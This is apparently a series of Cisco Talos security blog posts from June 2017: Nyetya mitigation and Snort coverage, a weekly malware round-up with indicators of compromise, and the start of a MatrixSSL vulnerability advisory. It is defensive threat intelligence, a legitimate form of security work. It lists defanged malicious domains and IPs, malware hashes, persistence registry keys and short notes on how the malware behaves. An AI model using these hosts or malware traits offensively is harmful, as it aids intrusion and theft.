Without analyzing the key generation or key storage components, Talos believes that the actors behind Nyetya did not intended for the boot sector or the ten sectors that are wiped to be restorable. Thus, Nyetya is intended to be destructive rather than as a tool for financial gain.

Mitigation and Prevention

There are several ways customers can mitigate and prevent Nyetya from impacting your environment.

First and foremost, we strongly recommend that customers who have NOT yet already applied MS17-010 to go do so immediately. Given the severity of the vulnerability and the widely available tools that exploit it, leaving this vulnerability unpatched is unwise.
Ensure you have anti-malware software deployed on your systems that can detect and block the execution of known malicious executables.
Implement a disaster recovery plan that includes backing up and restoring data from backup devices that are kept offline. Adversaries frequently target backup mechanisms to limit the possibilities a user may be able to restore their files without paying the ransom.
Disable SMBv1, if possible, on networks and move to a more updated version of SMB. (SMBv2 was introduced with Microsoft Vista)
Organizing your networks in a number of well-defined logical segments, and allowing access to network assets only to those users and systems within a segment may help with containing outbreaks of self-spreading worms such as Nyetya.

As Nyetya attempts to overwrite the boot sector on an infected machine, Talos tested using MBRFilter to prevent any changes being allowed to the system boot sector. This test proved successful and the machine boot sector remained intact in a good state. For users or enterprises that can do so, we recommend using MBRFilter. Note that MBRFilter is an open source project from Talos and no warranties or guarantees are provided.

Coverage

Cisco customers are protected from Nyetya via the following products and services.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Email and web have not been identified as attack vectors at this time. Additionally, there are no known C2 elements related to this malware at this time. The malware, if transferred across these systems on your networks, will be blocked.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

NGIPS / Snort Rules

The following NGIPS / Snort rules detect this threat:

42944 - OS-WINDOWS Microsoft Windows SMB remote code execution attempt
42340 - OS-WINDOWS Microsoft Windows SMB anonymous session IPC share access attempt
41984 - OS-WINDOWS Microsoft Windows SMBv1 identical MID and FID type confusion attempt
43459 - MALWARE-CNC Win.Trojan.Doublepulsar variant successful ping response

The following NGIPS / Snort rules are also indicators of infection traffic:

5718 - OS-WINDOWS Microsoft Windows SMB-DS Trans unicode Max Param/Count OS-WINDOWS attempt
1917 - INDICATOR-SCAN UPnP service discover attempt
5730 - OS-WINDOWS Microsoft Windows SMB-DS Trans Max Param OS-WINDOWS attempt
26385 - FILE-EXECUTABLE Microsoft Windows executable file save onto SMB share attempt
43370 - NETBIOS DCERPC possible wmi remote process launch

Threat Grid

Threat Grid is capable of detecting malware samples related to Nyetya as malicious.

Indicators of Compromise (IOCs)

AMP Coverage

W32.Ransomware.Nyetya.Talos

SHA256

027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998 (password stealer)

Threat Round-up for June 16 - June 23

noreply@blogger.com (Alexander Chiu) — Fri, 23 Jun 2017 12:55:00 PDT

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 16 and June 23. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Doc.Macro.StrObfuscation-6329879-0
VB Macro
Microsoft Office macros can be obfuscated in various ways. A recent resurgence of malicious Word documents include the use of a string obfuscation to mask the intended functionality
Win.Dropper.skypee-6329923-0
Dropper
This malware is a trojan dropper that is used to steal banking information and user credentials. It leverages Visual Basic code to install itself and establish persistence. Characteristics this malware exhibits include connecting to different domains to POST data using URI patterns like /http/image.php or /admin/image.php.
Win.Worm.Untukmu-5949608-0
Worm
Untukmu, also known as Brontok, is a worm spread through email or infected USB drives. It stores several copies of itself on different places on the hard disk, including system directories. It gains persistence by modifying registry keys and creating an entry in the Startup directory. IT also modifies several system configuration parameters to disable the registry editor and the shell, as well as modify the safeboot shell to prevent the user from cleaning the machine.
Win.Trojan.Shifu-6330434-1
Trojan
This well-known malware family contains counter measures to protect itself from analysis. It gathers details about its victims by stealing user's login credentials for online banking business.
Win.Trojan.Blackshades-6327385-1
Trojan
Blackshades is a prevalent trojan with many capabilities including logging keystrokes, recording video from webcams, and downloading and executing additional malware.
Win.Ransomware.BTCWare-6329927-0
Ransomware
BTCWare is active Windows ransomware that was first discovered a few months ago. Since then, it has undergone various changes, including changes to the encrypted file extension & the cipher used to encrypt such files. Earlier variants relied on weaker cryptography options that included RC4, allowing brute force recovery of the private key in some cases. There was also a noted variant that had its private RSA key leaked online. This recent variant relies on AES-256 with improvements to the handling of the private key generation.
Doc.Dropper.Agent-6330744-0
Office Macro Downloader
This is an obfuscated Office Macro downloader that leverages Powershell to download a malicious payload executable. The host that these samples attempt to download the next stage from currently does not resolve.
Win.Trojan.Yakes-6330794-0
Trojan
Yakes is a trojan which installs itself on a machine via a .vbs script in the Startup folder, and then allows its packager to connect to the infected machine. IPs and domain names of the CnC server as well as mutex names vary depending on the packager.
Win.Ransomware.Locky-6330799-0
Ransomware
Throughout the majority of 2016, Locky was the dominant ransomware in the threat landscape. It was an early pioneer when it came to using scripting formats Windows hosts would natively handle, like .js, .wsf, and .hta. These scripting formats acted as a vehicle to deliver the payload via email campaigns. Recent in-depth look: http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html
Win.Trojan.DownloaderJava-6330457-0
Downloader
This sample is a .NET downloader. It downloads additional Java files from an hardcoded URL and they are executed. This binary is actively sent as attachment in an ongoing spam campaign.

Threats

Doc.Macro.StrObfuscation-6329879-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

185[.]165[.]29[.]36
52[.]173[.]193[.]166

Domain Names

Files and or directories created

%TEMP%\<random_string>.txt
%TEMP%\<random_string>.txt
%TEMP%\<random_string>.js
%TEMP%\<random_string>.txt
%TEMP%\<random_string>.txt

File Hashes

b64e77a8b76986e6929e48507b5f8fed9c0eb339f058fa5a31d38920e25c3a8c
9bcbbba6636b99da1ab567813af8226fb22ab47509326c6501d22e40efa1464c
79a89d266bcf1b8c829b823203fce8e69159246469c14ac355f615c2dd783e01
b96f975a2c7cfb03e53e35f365e3f16e51c2370b15970693c7dd2201f08ddb1c
3e4c9f8828897c19e264a2a066d9c181edf08885b6fafdec833aa683259aced9
79a89d266bcf1b8c829b823203fce8e69159246469c14ac355f615c2dd783e01
48487be062791d86b66d10cbdd54ce1b1dfbfe99a86bfd8c3b2ba6be7df28f6e
3e4c9f8828897c19e264a2a066d9c181edf08885b6fafdec833aa683259aced9
b64e77a8b76986e6929e48507b5f8fed9c0eb339f058fa5a31d38920e25c3a8c
e0e134db8de265d9ecd2f174cd143da54a4a922d64abfff704488ded3c7b3bdf
9bcbbba6636b99da1ab567813af8226fb22ab47509326c6501d22e40efa1464c
02840c7ca57b46ba7d6b40f93e0054dd180a290b30c2a8397fcd646ef30cfdf6
6f39761c2c1fcd6975505a47828f9dec483c8ec730ba68eb05e09ef60a91c879
b96f975a2c7cfb03e53e35f365e3f16e51c2370b15970693c7dd2201f08ddb1c

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Dropper.skypee-6329923-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: skypee

Mutexes

1505527138

IP Addresses

Domain Names

Files and or directories created

File Hashes

35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8
09aa51458f73755e4e58a7d59853f07d685d7e7dc48971117b1e9392a1aa416f
99e7ecbe795d7d6a03c4965b2ac7d79544a6772a97ccaca909f66bfe174fa023
26ef58faf48e58dc0680c6b595436dbba01ea3c8fca809858fcfc47d66b56914
0d983d4ee06e08b4e1df021c17792a8352c8ff4b2d3e6ee4f7fe53ce30122d66
0b5800e19bdb4c43ab1469ce88af3d807eaa7620697a4b88368ab6beef098240
3a5c13ed645ab7571c2a6ba27fd689e748e7d42de35bc076d18ad76070a13d14
a6f34f3a70ea64adccfbd983abfebe9dc46741064da0520582b09ce6d6a966ee
5ac152e574c091986561d8055d0b0a97fab1267c6dfba69d169ac9c41a5bc390
f33a3141ee599c94ff60b40be0c0d18c66732640a809b4319a0140eb7827bafb
7f7fe90b586671e59c6769e4202871fb10573983de7fbe7ca7ad3a97af7395af
dd8826ffbe107318163ed2716231ccf588453308bbcd3c798720e7586c059f99
2b3d33238a64134c347db9a3f5b9f0fbecfe62199f081c3c44fb5f1b0948e7cc
e336b8976fb83889c3027ed084a02f9de97f90787304bfa87c58be8dd8035e20
7f990624c65a28f0803e19c5a37d34567a921d17531899a384f2077c1c6f5dff
c62ef9ef0c92b95740f8a67c9879d3c2f951655cccc20c310140668265d8135f
bb5f19265e7b5094cdf55c401bae987cf895bf885cf485c3c627c1fe267e9bfd
f5d55f9539e753fe3a4e0de50bb3c6347ee9928c0f6db33e5f6b6e4af179da0f
2948da52a96f06cfc4bfb7d4d079201aaa3ef89de1cc144462973107c4962435
77ca8909ec71c9086e569cb2acbf4c766dd60f758a5ccc938402d3f176636ae3
c80fbdbba34721670043965c3b02832df7f8cb1c5b5c57b04dbb5ee6346d5994
8c2579168922d065854582cc486a0bb43f8accb60ccc01ad1035894012ac2e83
de8f2233c54d10ae9b51325cefb5dfad644acc225d4ddacb5c77ed89b6b1a645
f5f11cc63feec411864cdc27f1d0d186b5173cf443876450e445d47d29b8ada6
1ca9f0b54357839435e64dd26d74fb365622b54395f56bf25985db0e7470a355
68ed0c9628c7764c5b3826309fe5db06a5380e7f1c8ebfb8f62c68d12d135b49

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Worm.Untukmu-5949608-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\OFFICE\12.0\OUTLOOK\RESILIENCY\STARTUPITEMS

Value: w+%

<HKCU>\SOFTWARE\MICROSOFT\OFFICE\12.0\OUTLOOK\RESILIENCY\STARTUPITEMS

Value: l:(

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: LogonAdministrator

<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\INSTALLER

Value: DisableMSI

<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE

Value: DisableSR

<HKCU>\CONTROL PANEL\DESKTOP

Value: SCRNSAVE.EXE

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER

Value: NoFolderOptions

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE

Value: FullPathAddress

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM

Value: DisableRegistryTools

<HKCU>\CONTROL PANEL\DESKTOP

Value: ScreenSaveTimeOut

<HKCU>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM

Value: DisableCMD

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: xk

<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE

Value: DisableConfig

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG

Value: Debugger

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON

Value: Shell

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: internat.exe

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MENUORDER\START MENU

Value: Order

<HKCU>\Software\Microsoft\Office\12.0\Outlook\Resiliency\StartupItems
<HKLM>\SOFTWARE\CLASSES\lnkfile\shell\open\command
<HKLM>\SOFTWARE\CLASSES\LNKFILE\SHELL\open
<HKLM>\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\System\

Mutexes

IP Addresses

Domain Names

Files and or directories created

\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\CSRSS.EXE
\Documents and Settings\Administrator\Local Settings\Application Data\winlogon.exe
\Documents and Settings\Administrator\Local Settings\Application Data\smss.exe
\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\SERVICES.EXE
\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\SMSS.EXE
%System32%\shell.exe
\Documents and Settings\All Users\Start Menu\Programs\Startup\Empty.pif
\Documents and Settings\Administrator\Local Settings\Application Data\lsass.exe
\XK\Folder.htt
\Documents and Settings\Administrator\Local Settings\Application Data\csrss.exe
%WinDir%\xk.exe
\Data Administrator.exe
\Documents and Settings\Administrator\Local Settings\Application Data\services.exe
%System32%\IExplorer.exe
\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\LSASS.EXE
%System32%\Mig2.scr
\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
\xk.exe
\XK\New Folder.exe

File Hashes

26fbb2aa5a28de5e149e0178dacb964333c852bbca2a1416d860e5edc84cbe04
b5e7b1b06efe80a081a2cbdff0fab4539be0797b2351ab4e1b247303586d1340
36890fa6756c252bc89abb88ec9da140cd87937eb5223af05e4e8ef36ec019c9
34c9c0d2fbb403f7e8068ce49071da6dbeadc4ad995101388c9ad092e38f90de

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.Shifu-6330434-1

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: IntelPowerAgent[0-9]

Mutexes

IP Addresses

Domain Names

DGA Domains
adtejoyo1377[.]tk

Files and or directories created

%PROGRAMDATA%\[a-z0-9]{8}.exe
%APPDATA%\[a-z0-9]{8}.exe

File Hashes

280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424
5283c7d5db5b5629b5b58534bcf6cd7607f0d015d740ca91ee85ade420b7460f
2271a2e9d72580e98331792d94fca75e5a0c1dfee958d79652adf9eaab3ee266
fc9a9633b8ab0b78a820c74bda57ab608316c81d6ed6b469e7487ce3712bf62b
3ad0138c2d8842f3aef8b045e05e28e441b81ea8444dce0b6799f4ec65c70540
23045a27de525a0d8c85390414ac4458a32bdbd6f9dc8f0e39b32dad3f89fa55
55768ac9504b8e612b380fc0984277f0576dd8d129a5363e73d4d2a9baff5c7e
06144d28c5d1db06fa8f78fdcb651145d6500483a9b1fe26c62a510dbe1763b7
bace9b3e3220c6e9f6281f4d4a1eabb9223e6093ccc9876c600a31671b790ed2
fbaab6ab727898b1ff27fdffec49bbe00976474b93741b1fca5eeb38f1f25099
0c4a32e9eaeb38e1b30ad44f52c4f8ea3f2e3f522d9b2281ecd3701383b20cfa
252db718eb383331a34cbe53c0b9889c80452e19bc06007e740eaa23e2ef2a8f
ca9c3f80a3faaaf001f3fdb37e1cf9abb14a1628be2a9f6ba4e0cc51ed708cb9
27922f495e54bf51cb7329a75c533ca4a1ab8323f1f781dfd027571a37c7485f
f1dcb8e18a764d300267f2bc0873bf8ec15385cec7ab1d2871e43f238f86a6f1
a9639bd0930f2db17de0321f99ce70355f1dba17b4aa6f5444a4c2490738e255
c0522065fbce82a74d13361c88be210f62a8633c9a59203cea0ce6722619092b
f7e904b2eb8c5280d008cdf93e10fab87df6bb2423bdf1e8f7bb203f63c15ede
280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424
e2404f8fb7f080cb0b344c1f006cde4a00143641633bb454069773d616a9106e
b232dccdb27873c64616d2cefcf2dd81f7958ec8778e31da7f1688a68fda4249

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Trojan.Blackshades-6327385-1

Indicators of Compromise

Registry Keys

HKU\Software\Microsoft\Windows\CurrentVersion\Run
HKU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run
<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Mutexes

LVLWU6KG22

IP Addresses

Domain Names

Files and or directories created

\Documents and Settings\Administrator\Local Settings\Temp\jd7018sy8tv.exe.jpg
%AppData%\D6GM5WGET8
%AppData%\JD7018SY8TV.exe.tmp
%AppData%\JD7018SY8TV.exe

File Hashes

017a3ea76063f364f9d7a70ecde761e22005b74fce020e798e6151d3806dd251
0620a1061f4c14acbaa3b5b70bab4894aae33bc9f30bc8623ea9f63ddc953088
0743dd7863c03515d74a1832592c1409bdff0d30aac4f45ba73dc99ef3c1e5e3
086be8b2789ccb88f60c71773de7c22cf1d97aa72d2b21a3cde9248cc7321606
0a3e9d5ec49cc97f1c9fc2a59e53462d0d2fe6fa1f448e69e401e63769dafe0a
0ba95e35fcde6b1b3f49d1267e3dea8f2a8b4acb5633bc3acb3aefe9bf3e7680
0d58482c771ef85649f1375f6ab61c48c380c7694b3ad7552af1bdc1ec724890
1014e1c1246a6c7cbb519ed711a2168955ee4b4222baae5be911f981088604db
15a64cded5bcf3dc911bfeb3a5701a376dea51f9f8530dc0949ba6e6f4339cc4
18039335deeaf295164f5e24c5afbcc50fa27f2eaf5733be2cf51bcf01f664c3

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.BTCWare-6329927-0

Indicators of Compromise

Registry Keys

Mutexes

ONYONLOCK

IP Addresses

Domain Names

Files and or directories created

%WinDir%\SoftwareDistribution\DataStore\DataStore.edb
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk
%System32%\config\SysEvent.Evt
%System32%\config\WindowsPowerShell.evt
%UserProfile%\Desktop\!#_RESTORE_FILES_#!

File Hashes

0951b80a41f06f8062c85c80be0276c6a1328edb2a501ed69ed25083303724d2
0b5b4111df2b4b2f78ec053db14ea5c74965ec13f1902570b06697d71a77dcd7
1cde4818229f719153565dd84b01d3927928e7a2b6a61684ee932520f55250a9
3f9b9062ca3497614ac021146b229b07786774934f98a261547b24df5cc5b263
6617035053954a5131d401061c58831e181ddfde221f402029d5ed4bd39561dd
6b4363a419208d6fe093f5a95b55653560d236e1a302f98d22fdfc36488ebcb1
72653d3a882901867143579131a6e9dff2f72a647afe21035c1deda0c4c943b0
741950e9be430267efff601fca1a7c21b65b904658fa46f9e618ea50787faaac
79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b
7bd14a6ceacc14e67e84add894d432c6383676ea89265b36515014cd136851e3
7c19bc3a4ad7cddcd78eee053b408779c25a56c9666e9cc9d76ea617aaa0934d
7f86548bdcd97e3faa3e8df0bd6b6aac7c05ed9d445a2bb7973a4d6efd39bd6a
880d25776e08769a75c43bf9a69f9f7cafcc46546690270fa36785195f327d97
8bbaa450526bc2933d462ae24439148273434ff342e0a0774d5e37af4bb16864
97b88ae6bee56ae6193c7908eaabac9be579861868cc575cc345c1d1bca1e302
cef0439b7b483900323614d6cf2eb341019d747aaa0feb81710ef836d330ca9c
d0ab335e86e665edbab58240ae6aa691fa4802ae831c0204e71f90a34ae66983
db5fefc3b8349efa907ed2812c869b10d8de109ff005fe8aac15eaa4c8efdcb8
eb843f4f80ae2e58b569f916239c6208601eece08efb334ae12b8658e3436987
ed3118f96c7e87ea768a40acc574b2ff3cae3a3cdf2419ccb30c750a876d5f30
f7850a2efe397098859d8c3d0ed0b4fa93f87148382e250f094d12f021bc8460
f9d27f4f3231cd80b19b30de4426aecada466e18ee785e82d5afa59e986b4d16

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Dropper.Agent-6330744-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

wi92[.]js2-order[.]pl

Files and or directories created

%AppData%.exe

File Hashes

0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87
3a8abf2f7fade51114fde4251ff98b23093e07a7545be3568f3da7ba730bb995
3a93346632f58a112708b761154a170be06de1b6a0583f58053cfb1fce09c780
6465c7ce45a1430e55cf10e43732892a1f86fa90646adf5628dd6d72dd849e8f
6ab9d03a0fc72b377712f262601db2f14561e6f285d9742e956416409bba3e64
8daded1c8acd270c0371e6c24310dacb4d841c801b707594823f371ce601f29b
9b23fd1d89331bddc13063391bea1c03fbaf813a584554cd43b1d6bb6574992a
d19a574a36079ca7885ae142c0f24578743eb98cca7f57df3c2258c8dbb874bc
d31705a64e38340872f6b9e8287e0297d4fd13cb8373295ce0d9ffdf6947e43f
e545a49f26d1482225dd25bf0b2790a1f6d5f96bda9afd90ec8cd38b7b20ec07
f048103ee6f0902b3025729301ce9bbbfee35272bc594be2a6cbd7da72f6f4c4

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Trojan.Yakes-6330794-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: 35bbded46273bc9f6fa3fc5557dba9af

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: 35bbded46273bc9f6fa3fc5557dba9af

<HKCU>\Software\35bbded46273bc9f6fa3fc5557dba9af
<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Mutexes

qazwsxedc
35bbded46273bc9f6fa3fc5557dba9af

IP Addresses

105[.]154[.]213[.]56
52[.]173[.]193[.]166

Domain Names

pokas12[.]ddns[.]net

Files and or directories created

%TEMP%\IXP000.TMP\1.xyz
%SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\x.vbs
%TEMP%\server.exe
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs

File Hashes

be73fc08bed6bba6c25688c150da18e26314c5d670d741d52c457e01f0a1ad0e
f1055f9d223106263dd0d8879be304da2cbe83428c2277a8b42c96c762121a1b
a5024be1b974fc16ca190a26a01bef35e02aceaa4c8fe8a3938084e22d623ce2
eb319d0c53ec709a0482cf58a65b615fcba38a2b44b41e832b4804c6aba68280
75d9b6086aa9bd51596733a163bd568cc648978ac68e7ebdd817654b4c7e6fed
d323180a15cf584a184aa63a0044ec7701cb9d75769386bec21992ffd585d9dc
eeb4c5448c1a4a8723f860c7ce30889c2c5d018abe17df43fae2f6d23a713568
4657c3f05d44048fdfc41190e652413ba2508565aa9185fa1a0670a2536a95cc
c585135463d4fce5053f47c255747524585b98c1c3f8dc305beefa17d2fcfa9e
c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Ransomware.Locky-6330799-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

.*\loptr-5e5a.htm
<GUID>.loptr

File Hashes

091141f6b67540ba8848f1b081ad40d5f6d8172c878d40046f82ab0234acf3db
7f4777245025c96d936d14b3b4a718be35ced59558f090e1197adfca5d9573b2
26074772fa68db08f463c66deeabe064bcd9d48032430bbbdf27ffdf8967e8c5
85fa592bf685966d8da1cf72f2c6c092b40664de9c17d9cc4894f8f08e06f567
49184047c840287909cf0e6a5e00273c6d60da1750655ad66e219426b3cf9cd8
e7b8d8e3c19b6b3cc4a6eafced463f08176330fe243d8a9fcd20aedc5af17806

Coverage

Screenshots of Detection

AMP

ThreatGrid

Screenshot

Win.Trojan.DownloaderJava-6330457-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: internat.exe

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: miZPeWpyLHr

<HKCU>\Software\Microsoft\SystemCertificates\My
<HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\TrustedPublisher
<HKCU>\Software\Microsoft\Windows Script Host\Settings
<HKLM>\SOFTWARE\WOW6432NODE\Microsoft
<HKCU>\Software\Microsoft\SystemCertificates\TrustedPublisher
<HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\TrustedPublisher
<HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
<HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLs
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
<HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\SystemCertificates
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TrustedPeople
<HKCU>\Software\Microsoft\SystemCertificates\trust
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA
<HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\CTLs
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
<HKCU>\Software\Microsoft\SystemCertificates\Disallowed
<HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Disallowed
<HKCU>\Software\Policies\Microsoft\SystemCertificates\CA
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\Certificates
<HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TrustedPublisher
<A>\{C108F07B-312C-11E7-8D90-00501E3AE7B5}\DEFAULTOBJECTSTORE\LruList
<HKLM>\SYSTEM\CONTROLSET001\Control\DeviceClasses
<HKLM>\SYSTEM\CONTROLSET001\Control\CoDeviceInstallers
<HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\Root
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
<HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
<HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLs
<HKLM>\Software\Microsoft\SystemCertificates\TrustedPeople
<A>\{C108F07B-312C-11E7-8D90-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A93\Indexes
<HKLM>\SOFTWARE\WOW6432NODE\Policies
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Fax\PrinterDriverData
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs

Mutexes

N11463_-4521624950585898-1497978066453
Local\__DDrawExclMode__
Local\__DDrawCheckExclMode__
RasPbFile

IP Addresses

149[.]210[.]145[.]237

Domain Names

nup[.]pw

Files and or directories created

%AppData%\.qjava\Java\lib\jfr.jar
%AppData%\.qjava\Java\lib\rt.jar
%AppData%\.qjava\Java\lib\jfr\default.jfc
%AppData%\1497978066454.jar
%AppData%\.qjava\Java\lib\javafx.properties
%AppData%\.q7z.exe
%TEMP%\_0.15066600419658372851713423405977803.class
%WinDir%\Temp\FXSTIFFDebugLogFile.txt
\Users\Administrator\UlBrZNAMJSJ\iMCImxZnYcm.KwyVDG
%TEMP%\tmpA3A6.8e4d0709-e282-42fd-a717-9d512ecd2cb0.7z
%TEMP%\_0.32579030377917368405753216876059627.class
\TEMP\c9bd2f466d2c1500af5414f03f7d5c908cafdd602c23a8136cf82054233f7791.exe
%TEMP%\Windows7851854962857713622.dll
\Users\Administrator\fUTkALeaTxM\ID.txt
%AppData%\Oracle\lib\fontconfig.properties.src
%AppData%\.qjava\Java\lib\ext\cldrdata.jar
%TEMP%\tmpA3A6.tmp
\Users\Administrator\UlBrZNAMJSJ\ID.txt
%AppData%\Oracle\lib\jfr\profile.jfc
%TEMP%\tmpA395.tmp

File Hashes

c9bd2f466d2c1500af5414f03f7d5c908cafdd602c23a8136cf82054233f7791
a49fb3f2f4a8e5d996b49d51eae11ec11dca3a1aa2db319ed004d898c4484bf2
b0f8ca0c55a07bc4a9a12ee6dade6843aa9ca875ebd082759b2a85727fe64f83
26c487810b80460a69711463dc3ffaa8d0ca6cc21dbf2856660fc1ceed23af53
555bdc43352d19ed64b7580206208462bfd3be9038bcb92c0898d2861f995c4b
3977f37224326f7508ed5f086fc4161d2f8d2aacff62f7c05d29243a8f401fa8
a84eef3d331514764cb72146a376f61e3cf2189fa7d2f81d1a7e99b41fafaedf

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Vulnerability Spotlight: Multiple Vulnerabilities in InsideSecure MatrixSSL

noreply@blogger.com (Edmund Brumaghin) — Thu, 22 Jun 2017 10:37:00 PDT

These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos

Overview

MatrixSSL is a TLS/SSL stack offered in the form of a Software Development Kit (SDK) that is geared towards application in Internet of Things (IOT) devices and other embedded systems. It features low resource overhead and supports many different embedded platforms. It also features FIPS 140-2 compliant cryptography making it suitable for use in high security environments. Talos recently discovered multiple vulnerabilities in MatrixSSL version 3.8.7b including two remote code execution (RCE) vulnerabilities as well as an information disclosure vulnerability.

